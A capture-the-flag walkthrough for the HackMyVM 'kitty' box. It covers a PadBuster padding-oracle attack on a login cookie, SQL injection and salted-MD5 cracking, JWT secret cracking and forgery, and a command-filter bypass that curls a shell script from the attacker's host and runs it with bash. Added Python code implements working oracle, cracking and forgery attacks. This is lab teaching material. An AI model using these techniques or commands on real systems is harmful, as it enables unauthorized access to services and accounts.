hackmyvm: kitty walkthrough
2022-08-02 03:59:00 【xdeclearn】
0x01 padding oracle
Port scan:
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp (Gitea)
Accessing port 80 with curl redirects to http://kitty.hmv. That site is static; ffuf found the virtual host cookie.kitty.hmv.
Register the user test and look at the cookie: auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG (32 base64 characters, i.e. 24 bytes: an IV plus two 8-byte blocks, which is why the tool is given a block size of 8 and reports two blocks).
Use oraclepadding.pl (a renamed PadBuster, as its banner shows) to attack the cookie. The application answers a valid cookie with a 302 to login.php and a cookie with bad padding with a 302 to logout.php?err=1; that difference is the oracle:
* ~ ./oraclepadding.pl http://cookie.kitty.hmv/home/index.php OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG 8 -cookies "auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG"
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 302 8144 ../login.php
2 ** 255 302 0 ../logout.php?err=1
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (237/256) [Byte 8]
[+] Success: (41/256) [Byte 7]
[+] Success: (219/256) [Byte 6]
[+] Success: (75/256) [Byte 5]
[+] Success: (240/256) [Byte 4]
[+] Success: (143/256) [Byte 3]
[+] Success: (29/256) [Byte 2]
[+] Success: (188/256) [Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 29751a62938de522
[+] Intermediate Bytes (HEX): 4ce47715b126d512
[+] Plain Text: user=tes
Use of uninitialized value $plainTextBytes in concatenation (.) or string at ./oraclepadding.pl line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***
[+] Success: (220/256) [Byte 8]
[+] Success: (32/256) [Byte 7]
[+] Success: (119/256) [Byte 6]
[+] Success: (112/256) [Byte 5]
[+] Success: (160/256) [Byte 4]
[+] Success: (229/256) [Byte 3]
[+] Success: (139/256) [Byte 2]
[+] Success: (171/256) [Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): 0d11b045b105c246
[+] Intermediate Bytes (HEX): 5d721d65948ae225
[+] Plain Text: t
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=test
[+] Decrypted value (HEX): 757365723D7465737407070707070707
[+] Decrypted value (Base64): dXNlcj10ZXN0BwcHBwcHBw==
-------------------------------------------------------
Change the username to admin and obtain a new cookie: the same oracle drives PadBuster's encrypt mode (-plaintext "user=admin"), which builds a valid ciphertext for a chosen plaintext without knowing the key.
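To make the attack above concrete, here is an added Python example (not from the walkthrough and not PadBuster's code) that reimplements what PadBuster did: a simulated cookie service whose only leak is pad-valid versus pad-invalid, the byte-by-byte recovery of each block's intermediate value, CBC decryption of user=test, and the encrypt-mode forgery of a user=admin cookie. Assumptions: the server's cipher is replaced by a keyed 8-byte Feistel permutation (the attack is cipher-agnostic), padding is PKCS#7 with the page's block size of 8, and the IV is the first block of the cookie.

```python
import hashlib
import hmac
import os

BLOCK = 8  # the walkthrough's PadBuster run used an 8-byte block size

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

class ToyBlockCipher:
    """Keyed 64-bit Feistel permutation on HMAC-SHA256 (assumption: a stand-in for the server's cipher, which the attack never needs)."""
    def __init__(self, key: bytes):
        self.key = key
    def _round(self, half: bytes, i: int) -> bytes:
        return hmac.new(self.key, bytes([i]) + half, hashlib.sha256).digest()[:4]
    def encrypt_block(self, block: bytes) -> bytes:
        left, right = block[:4], block[4:]
        for i in range(8):
            left, right = right, xor(left, self._round(right, i))
        return left + right
    def decrypt_block(self, block: bytes) -> bytes:
        left, right = block[:4], block[4:]
        for i in reversed(range(8)):
            left, right = xor(right, self._round(left, i)), left
        return left + right

def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def split_blocks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

class CookieServer:
    """Simulated app: cookie = IV || CBC(PKCS#7(plaintext)); the response leaks whether unpadding worked (302 login.php vs 302 logout.php?err=1)."""
    def __init__(self):
        self.cipher = ToyBlockCipher(os.urandom(16))
    def issue_cookie(self, plaintext: bytes) -> bytes:
        prev = os.urandom(BLOCK)
        out = [prev]
        for block in split_blocks(pkcs7_pad(plaintext)):
            prev = self.cipher.encrypt_block(xor(block, prev))
            out.append(prev)
        return b"".join(out)
    def decrypt(self, cookie: bytes) -> bytes:
        blocks = split_blocks(cookie)
        return pkcs7_unpad(b"".join(xor(self.cipher.decrypt_block(c), p) for p, c in zip(blocks, blocks[1:])))
    def padding_ok(self, cookie: bytes) -> bool:  # the oracle the attacker gets to ask
        try:
            self.decrypt(cookie)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, block: bytes) -> bytes:
    """Recover D_k(block) with the oracle alone: for each position craft a fake previous block so the decrypted tail becomes valid padding."""
    inter = bytearray(BLOCK)
    for k in range(BLOCK - 1, -1, -1):
        pad = BLOCK - k
        fake = bytearray([0] * (k + 1) + [inter[j] ^ pad for j in range(k + 1, BLOCK)])  # bytes after k decrypt to `pad`
        for guess in range(256):
            fake[k] = guess
            if not oracle(bytes(fake) + block):
                continue
            # last byte only: a hit could be an accidental \x02\x02 etc.; flipping the byte before it must keep \x01 valid
            if k == BLOCK - 1 and not oracle(bytes(fake[:k - 1]) + bytes([fake[k - 1] ^ 0xFF, guess]) + block):
                continue
            inter[k] = guess ^ pad
            break
        else:
            raise RuntimeError(f"no valid padding found for byte {k}; the oracle signal is probably wrong")
    return bytes(inter)

def decrypt_cookie(oracle, cookie: bytes) -> bytes:
    blocks = split_blocks(cookie)
    return pkcs7_unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))

def forge_cookie(oracle, plaintext: bytes) -> bytes:
    """PadBuster encrypt mode: pick any last block, then walk backwards so each earlier block XORs the next block's intermediate into our plaintext."""
    current = bytes(BLOCK)
    out = [current]
    for want in reversed(split_blocks(pkcs7_pad(plaintext))):
        current = xor(recover_intermediate(oracle, current), want)
        out.append(current)
    return b"".join(reversed(out))

if __name__ == "__main__":
    server = CookieServer()
    cookie = server.issue_cookie(b"user=test")
    print(decrypt_cookie(server.padding_ok, cookie), server.decrypt(forge_cookie(server.padding_ok, b"user=admin")))
```

Each byte costs at most 256 oracle requests plus one confirmation for the final byte, which is the "(237/256) [Byte 8]" accounting in the PadBuster output above; the padded plaintext of user=test is the same 757365723d7465737407070707070707 the tool printed.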
0x02 SQL injection
After updating the cookie and refreshing, last_login.js appears on the page; the endpoint that script calls is SQL-injectable.
Using sqlmap, the password hash and salt of the user gitea were dumped:
| hash                             | user  | salt         |
| 357f47546ba3ab1cf633d3d0c54e2583 | gitea | YXZpam5leWFt |
Crack it with hashcat mode 10 (md5($pass.$salt)), supplying the hash as hash:salt:
* ~ hashcat -m 10 -a 0 357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt /usr/share/wordlists/rockyou.txt --show
357f47546ba3ab1cf633d3d0c54e2583:YXZpam5leWFt:git0ffme
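An added Python example (not from the walkthrough) that shows what hashcat -m 10 actually checks, plus the two things worth settling before a long run: whether the scheme is md5($pass.$salt) (mode 10) or md5($salt.$pass) (mode 20), and whether the salt is used literally or after base64 decoding (YXZpam5leWFt decodes to the ASCII string avijneyam; the page's hashcat run succeeded with the literal form). The hash and salt are the page's; the wordlist is constructed.

```python
import base64
import hashlib

# Values from the walkthrough's sqlmap dump and hashcat run.
GITEA_HASH = "357f47546ba3ab1cf633d3d0c54e2583"
GITEA_SALT = "YXZpam5leWFt"

def md5_pass_salt(password: str, salt: str) -> str:
    """hashcat -m 10: md5($pass.$salt)."""
    return hashlib.md5((password + salt).encode()).hexdigest()

def md5_salt_pass(password: str, salt: str) -> str:
    """hashcat -m 20: md5($salt.$pass)."""
    return hashlib.md5((salt + password).encode()).hexdigest()

def salt_variants(salt: str):
    """The literal salt first, then its base64 decoding when that is printable text
    (some apps store the salt base64-encoded but hash with the raw value)."""
    variants = [salt]
    try:
        decoded = base64.b64decode(salt + "=" * (-len(salt) % 4), validate=True).decode("ascii")
        if decoded.isprintable():
            variants.append(decoded)
    except (ValueError, UnicodeDecodeError):
        pass
    return variants

def crack(target_hash: str, salt: str, wordlist):
    """Return (password, salt_form, hashcat_mode) for the first candidate that matches, else None."""
    target_hash = target_hash.lower()
    salts = salt_variants(salt)
    for candidate in wordlist:
        for s in salts:
            if md5_pass_salt(candidate, s) == target_hash:
                return candidate, s, 10
            if md5_salt_pass(candidate, s) == target_hash:
                return candidate, s, 20
    return None

if __name__ == "__main__":
    # constructed mini wordlist standing in for rockyou.txt
    print(crack(GITEA_HASH, GITEA_SALT, ["123456", "password", "gitea", "git0ffme"]))
```

On a real dump, run this over the first few thousand rockyou entries before committing to one hashcat mode; trying the wrong salt order or salt encoding is the usual reason a "known" md5+salt hash refuses to crack.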
0x03 OpenAPI to shell
Log in to host:3000 (Gitea) with the gitea account; this reveals a new subdomain: http://whythisapiissofast.kitty.hmv.
Fetch http://whythisapiissofast.kitty.hmv/openapi.json and go through each API.
1. http://whythisapiissofast.kitty.hmv/api/v2/-1 (negative IDs are accepted) returns the user nobody.
2. http://whythisapiissofast.kitty.hmv/api/v2/-2 returns a private key.
3. Obtain an access token as nobody; it is a JWT.
4. Crack the JWT's signing secret with hashcat.
5. Forge the token: change the user from nobody to admin, set is_admin to 1, and move the expiry further out.
6. /api/v2/secure/{command} executes commands, but a filter sits in front of it.
7. Bypass the filter by downloading a malicious shell script with curl and running it with bash; this gives a shell.
Set the index of the attacker's nginx to test.sh so that the bare curl fetch below retrieves it (note the trailing -wget argument in both requests):
(1) whythisapiissofast.kitty.hmv/api/v2/secure/curl%20-o%20test.sh%20192.168.85.169%20-wget
(2) whythisapiissofast.kitty.hmv/api/v2/secure/bash%20test.sh%20-wget
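Steps 3 to 5 as an added Python example (not the walkthrough's code and not the API's): HS256 signing and verification with only the standard library, the offline dictionary attack on the secret that hashcat -m 16500 performs, and re-signing the token as admin with is_admin=1 and a later exp. Assumptions: the token is HS256 and carries claims named user, is_admin and exp; the secret kitty123 and the wordlist are constructed for the demo and are not the box's.

```python
import base64
import hashlib
import hmac
import json
import time

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims: dict, secret: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(b64url(json.dumps(part, separators=(",", ":")).encode()) for part in (header, claims))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def verify_hs256(token: str, secret: bytes):
    """Return the claims if the HS256 signature verifies under `secret`, else None."""
    try:
        head, body, sig = token.split(".")
        header = json.loads(b64url_decode(head))
        signature = b64url_decode(sig)
    except ValueError:
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":  # no alg=none / key-confusion games
        return None
    expected = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(b64url_decode(body))

def crack_secret(token: str, wordlist):
    """Offline dictionary attack on the signing secret: one HMAC per candidate, no requests to the target (what hashcat -m 16500 does)."""
    for word in wordlist:
        if verify_hs256(token, word.encode()) is not None:
            return word.encode()
    return None

def forge_admin(token: str, secret: bytes, lifetime: int = 30 * 86400) -> str:
    """Re-sign the token as admin with is_admin=1 and a far-off expiry (claim names are assumptions about the API's token)."""
    claims = verify_hs256(token, secret)
    if claims is None:
        raise ValueError("secret does not verify this token")
    claims.update({"user": "admin", "is_admin": 1, "exp": int(time.time()) + lifetime})
    return sign_hs256(claims, secret)

if __name__ == "__main__":
    secret = b"kitty123"  # constructed demo secret
    token = sign_hs256({"user": "nobody", "is_admin": 0, "exp": int(time.time()) + 600}, secret)
    found = crack_secret(token, ["password", "admin", "kitty123"])  # constructed wordlist
    print("secret:", found)
    forged = forge_admin(token, found)
    print(forged)
    print(verify_hs256(forged, found))
```

Because the API trusts whatever the signature covers, a recovered secret turns every claim into attacker-controlled input; the verifier above also refuses tokens whose header does not say HS256, which is the check the server side should have in addition to a secret that does not survive a wordlist.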
0x04 get user flag
There are two users in the home directory.
The private key obtained from /api/v2/-2 above allows an ssh login as the user dyutidhara, which yields the user flag.
0x05 root privilege escalation
Tried some methods and failed. If you have succeeded, please let me know in the comments; help wanted.